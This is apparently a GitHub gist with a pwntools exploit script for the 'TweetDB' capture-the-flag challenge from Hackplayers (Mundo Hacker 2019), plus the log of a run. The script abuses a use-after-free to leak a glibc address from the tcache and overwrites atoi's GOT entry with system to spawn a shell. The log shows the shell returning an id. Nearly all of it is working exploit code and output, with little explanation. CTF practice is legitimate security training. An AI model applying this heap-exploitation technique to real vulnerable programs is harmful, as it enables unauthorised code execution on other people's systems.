Last active
May 6, 2019 14:36
-
-
Save KaoRz/af786915d8ca48893fc1b8b78c0b7e78 to your computer and use it in GitHub Desktop.
TweetDB - Exploiting Challenge | Hackplayers challenge (Mundo Hacker 2k19)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| elf = ELF('./tweetdb') | |
| libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False) | |
| local = False | |
| HOST = 'challenges.hackplayers.com' | |
| PORT = 1337 | |
| # context.terminal = ['tmux', 'sp', '-h'] | |
| # context.log_level = 'DEBUG' | |
| def add(data, comments = '1', retweets = '2', likes = '3'): | |
| io.sendline('1') | |
| io.sendlineafter('tweet: ', data) | |
| io.sendlineafter('comments: ', comments) | |
| io.sendlineafter('retweets: ', retweets) | |
| io.sendlineafter('likes: ', likes) | |
| io.recvuntil('TDB> ') | |
| def select(idx): | |
| io.sendline('2') | |
| io.sendlineafter('ID: ', str(idx)) | |
| io.recvuntil('TDB> ') | |
| def remove(idx): | |
| io.sendline('3') | |
| io.sendlineafter('ID: ', str(idx)) | |
| io.recvuntil('TDB> ') | |
| def edit(data, shell = False): | |
| io.sendline('4') | |
| io.sendlineafter('TDB> ', '1') | |
| io.sendlineafter('tweet: ', data) | |
| if shell: | |
| io.sendlineafter('TDB> ', 'sh') | |
| else: | |
| io.sendlineafter('TDB> ', '0') | |
| io.recvuntil('TDB> ') | |
| def show(): | |
| io.sendline('5') | |
| if local == True: | |
| io = process(elf.path) | |
| else: | |
| io = remote(HOST, PORT) | |
| io.recvuntil('TDB> ') | |
| log.progress('Filling TCACHE bin...') | |
| for i in xrange(9): | |
| add(chr(ord('A') + i) * 0x80) | |
| for i in xrange(7): | |
| remove(i) | |
| select(7) | |
| remove(7) | |
| show() | |
| leak = u64(io.recvline()[7:-1].ljust(8, '\x00')) | |
| libc.address = leak - 0x3ebca0 | |
| log.success('GLIBC leak address: ' + hex(leak)) | |
| log.success('GLIBC base address: ' + hex(libc.address)) | |
| log.success('GLIBC system address: ' + hex(libc.sym['system'])) | |
| log.progress('Overwriting atoi@@GLIBC GOT with system@@GLIBC...') | |
| add('W' * 0x10) | |
| add('X' * 0x10) | |
| add('Y' * 0x10) | |
| add('Z' * 0x10 + p64(elf.got['atoi'])) | |
| edit(p64(libc.sym['system']), shell = True) | |
| log.progress('Spawning /bin/sh...') | |
| io.interactive() | |
| io.close() | |
| ''' | |
| lab@ubuntu:~/Desktop/RetoMundoHacker$ python xpl.py | |
| [*] '/home/lab/Desktop/RetoMundoHacker/tweetdb' | |
| Arch: amd64-64-little | |
| RELRO: No RELRO | |
| Stack: Canary found | |
| NX: NX enabled | |
| PIE: No PIE (0x400000) | |
| [+] Starting local process '/home/lab/Desktop/RetoMundoHacker/tweetdb': pid 18257 | |
| [>] Filling TCACHE bin... | |
| [+] GLIBC leak address: 0x7f02fe93eca0 | |
| [+] GLIBC base address: 0x7f02fe553000 | |
| [+] GLIBC system address: 0x7f02fe5a2440 | |
| [>] Overwriting atoi@@GLIBC GOT with system@@GLIBC... | |
| [O] Spawning /bin/sh... | |
| [*] Switching to interactive mode | |
| $ id | |
| uid=1000(lab) gid=1000(lab) groups=1000(lab),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment